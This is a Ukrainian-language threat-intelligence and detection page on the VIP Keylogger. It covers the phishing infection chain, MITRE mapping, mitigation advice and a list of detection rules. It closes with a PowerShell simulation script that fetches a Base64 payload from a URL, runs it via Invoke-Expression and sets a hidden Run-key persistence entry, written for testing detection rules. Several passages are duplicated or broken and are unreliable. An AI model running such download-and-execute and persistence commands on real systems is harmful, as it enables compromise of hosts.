Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
VIP Keylogger – це модульна загроза, яка викрадає інформацію і постачається через фішинг-приманки, такі як фальшиві сповіщення про платежі банку. Її ланцюг зараження базується на шкідливих VBS-, JavaScript- або bat-файлах, які використовують сильну обфускацію, стеганографію в PNG-изображеннях і зловживання змінними оточення для приховування етапів PowerShell перед запуском остаточного кейлогера. Коли він стає активним, шкідливе програмне забезпечення захоплює облікові дані, знімки екрана, вміст буфера обміну та паролі Wi-Fi, а потім ексфільтрує дані через декілька каналів керування та управління. Зусилля щодо виявлення слід сконцентрувати на підозрілих змінах реєстру, незвичайних значеннях змінних оточення та аномальних переходах від виконання скрипта до виконуваних файлів.
Розслідування
Команда досліджень загроз Splunk переглянула понад 200 зразків завантажувачів, зібраних у березні та квітні 2026 року, документуючи їхні шаблони найменувань, варіанти завантажувачів та використання стеганографії у файлах PNG для доставки корисного навантаження. Дослідники відтворили процес деобфускації, виявили зловживання змінною oточення INTERNAL_DB_CACHE і простежили стійкість до ключа реєстру UserInitMprLogonScript. Звіт також зіставив кожну спостережену поведінку з відповідною технікою MITRE ATT&CK для підтримки проектування виявлення. registry key. The report also mapped each observed behavior to relevant MITRE ATT&CK techniques to support detection engineering.
Пом’якшення
Організації повинні зупинити початкові фішинг-спроби шляхом посилення захисту електронної пошти та фільтрації URL-адрес. Захисникам слід стежити за створенням і модифікацією значень HKCUEnvironment, особливо за завищеними записами або використанням змінної змінної. Виконання скриптових завантажувачів з каталогів, доступних для запису користувачів, слід обмежити, а режим мовлення PowerShell Constrained Language Mode слід запроваджувати, де це можливо. Інструменти безпеки робочих станцій також повинні виявляти ін’єкцію процесу в INTERNAL_DB_CACHE та підозрілу активність та підозрілу активність netsh. Відповідь У разі виявлення індикатора VIP Keylogger ізолюйте уражений хост, зберіть дані з оперативної пам’яті та журнали останнього виконання процесу, проведіть пошук відомих артефактів реєстру, URL-адрес командного керування, заснованих на PNG, та отриманих файлів. Шкідливі скрипти повинні бути видалені, виявлені облікові дані – скинуті, а більш широкий обсяг перевірки повинен бути виконаний по всьому середовищу на предмет схожих артефактів завантажувача та механізмів стійкості.
Response
Якщо виявлено індикатор VIP Keylogger, ізолюйте уражений вузол, зберіть оперативну пам’ять та журнали виконання недавніх процесів, а також перевірте наявність відомих артефактів реєстру, URL-адрес командних центрів (C2) на основі PNG та залишених файлів. Шкідливі скрипти слід видалити, скомпрометовані облікові дані скинути, а також провести ширшу перевірку середовища на наявність пов’язаних артефактів завантажувача та механізмів закріплення в системі.
graph TB classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef operator fill:#ff9900 initial_access[“<b>Дія</b> – <b>T1566 Фішинг</b><br/>Шкідливі .vbs/.js/.bat файли, доставлені через email”] class initial_access action execution[“<b>Дія</b> – <b>T1059.005 Visual Basic</b>, <b>T1059.007 JavaScript</b>, <b>T1059.001 PowerShell</b><br/>Виконання початкових скриптів на хості”] class execution action obfuscation[“<b>Дія</b> – <b>T1027.016 Вставка сміттєвого коду</b>, <b>T1027.003 Стеганографія</b>, <b>T1027.009 Вбудовані навантаження</b><br/>Приховані або замасковані payload”] class obfuscation action persistence[“<b>Дія</b> – <b>T1574.007 Перехоплення потоку виконання</b> через реєстр (UserInitMprLogonScript)<br/><b>T1037.001 Скрипт автозапуску</b><br/>Запуск при логіні”] class persistence action priv_esc[“<b>Дія</b> – <b>T1055.002 Інʼєкція процесу PE</b>, <b>T1055.001 DLL інʼєкція</b>, <b>T1620 Рефлексивне завантаження коду</b><br/>Підвищення привілеїв та уникнення захисту”] class priv_esc action credential_access[“<b>Дія</b> – <b>T1555.003 Дані браузера</b>, <b>T1056.001 Кейлогінг</b>, <b>T1115 Перехоплення буфера обміну</b><br/>Збір облікових даних”] class credential_access action discovery[“<b>Дія</b> – <b>T1596.005 Виявлення зовнішньої IP</b> через публічні сервіси<br/><b>T1016.002 Виявлення Wi-Fi</b><br/>Збір мережевої інформації”] class discovery action collection[“<b>Дія</b> – <b>T1113 Знімки екрана</b><br/>Збір візуальних даних робочого столу”] class collection action c2[“<b>Дія</b> – <b>T1071.001 Веб-протоколи</b> та Telegram API<br/>Командування і контроль”] class c2 action defense_evasion[“<b>Дія</b> – <b>T1070.004 Видалення файлів</b>, <b>T1070.010 Видалення індикаторів</b><br/>Приховування слідів”] class defense_evasion action initial_access –>|веде_до| execution execution –>|веде_до| obfuscation obfuscation –>|веде_до| persistence persistence –>|веде_до| priv_esc priv_esc –>|веде_до| credential_access credential_access –>|веде_до| discovery discovery –>|веде_до| collection collection –>|веде_до| c2 c2 –>|веде_до| defense_evasion
Потік Атаки
Можливе спілкування з доменами (через DNS) при спробах перегляду IP
Команда SOC Prime
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Можливість виконання через приховані командні рядки PowerShell (через командний рядок)
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
LOLBAS WScript / CScript (через процес створення)
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Підозрілі рядки powershell (через powershell)
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Виклик підозрілих методів .NET з PowerShell (через powershell)
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Можливе зловживання Telegram як каналом командування та управління (через dns_query)
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
IOCs (HashSha256) для виявлення: За кодом: Багаторівневий захист від обходу VIP Keylogger
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Правила SOC Prime AI
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Стійкість VIP Keylogger через модифікацію реєстру Windows [Подія реєстру Windows]
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Виконання симуляції
Можливі точки стійкості [ASEPs – Software/NTUSER Hive] (через подію реєстру)
Передумова: має пройти перевірка телеметрії та первинної перевірки.
Обґрунтування: цей розділ описує точне виконання технік та практик противника (TTP), розроблених для запуску правила виявлення. Команди та наратив ПОВИННІ напряму відображати ідентифіковані TTP і прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або несхожі приклади призведуть до неправильного діагнозу.
Наратив і команди атаки:
-
Початкова розвідка
- – нападник запускає (T1016.002) для виявлення відносин довіри домену.
(T1016.002) для виявлення відносин довіри домену.Отримання корисного навантаження - – використовуючи (T1071.001), нападник завантажує DLL з кодом, закодованим в Base64, який реалізує кейлогер (T1056.001).
(T1071.001), нападник завантажує DLL з кодом, закодованим в Base64, який реалізує кейлогер (T1056.001).Упорядкування через змінну оточення - – завантажений рядок зберігається в змінній оточення на рівні користувача через . Цей крок задовольняє фокус правила виявлення на маніпуляції змінними оточення.
[Environment]::SetEnvironmentVariableДинамічне виконання - – зловмисник негайно виконує корисне навантаження за допомогою (T1059.001). Кейлоггер починає захоплення натискань клавіш, скріншотів (T1113) та даних буфера обміну (T1115).
(T1059.001). Кейлоггер починає захоплення натискань клавіш, скріншотів (T1113) та даних буфера обміну (T1115).Очищення - – після встановлення стійкості (наприклад, створення RunKey, T1037.001) зловмисник видаляє тимчасовий DLL з диска (T1070.004) і видаляє змінну оточення, щоб зменшити судово-медичний слід. Сценарій зворотної перевірки:
- – нападник запускає (T1016.002) для виявлення відносин довіри домену.
-
Сценарій нижче відтворює точні кроки та генерує телеметрію, яку правило Sigma очікує. # Симуляція VIP Keylogger – PowerShell # ————————————————- # 1. Завантажити підставне корисне навантаження (рядок, закодований в Base64) $payloadUrl = “https://raw.githubusercontent.com/example/dummy-keylogger/main/payload.b64” $b64Payload = (Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing).Content.Trim() # 2. Зберегти корисне навантаження у змінній середовища на рівні користувача $envVarName = “VIPPayload” [Environment]::SetEnvironmentVariable($envVarName, $b64Payload, “User”) # 3. Декодувати та виконати корисне навантаження через Invoke-Expression $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64Payload)) Invoke-Expression $decoded # 4. (Необов’язково) Стійкість через Run Key – демонструє T1037.001 $runKey = “HKCU:SoftwareMicrosoftWindowsCurrentVersionRun” Set-ItemProperty -Path $runKey -Name “VIPKeylogger” -Value “powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command `”Invoke-Expression $env:$envVarName`”” # 5. Очищення – видалення змінної середовища та запису Run Key Start-Sleep -Seconds 30 # дати змогу зафіксувати деякі дії Remove-ItemProperty -Path $runKey -Name “VIPKeylogger” -ErrorAction SilentlyContinue [Environment]::SetEnvironmentVariable($envVarName, $null, “User”)
Команди очищення: -
Виконайте ці команди, щоб повернути систему в початковий стан після тесту. # Видалити змінну оточення, створену для тесту [Environment]::SetEnvironmentVariable(“VIPPayload”, $null, “User”) # Видалити запис ключа стійкості Run, якщо він існує $runKey = “HKCU:SoftwareMicrosoftWindowsCurrentVersionRun” Remove-ItemProperty -Path $runKey -Name “VIPKeylogger” -ErrorAction SilentlyContinue # Очистити будь-які залишкові записи історії PowerShell (необов’язково) Clear-History
Потік атаки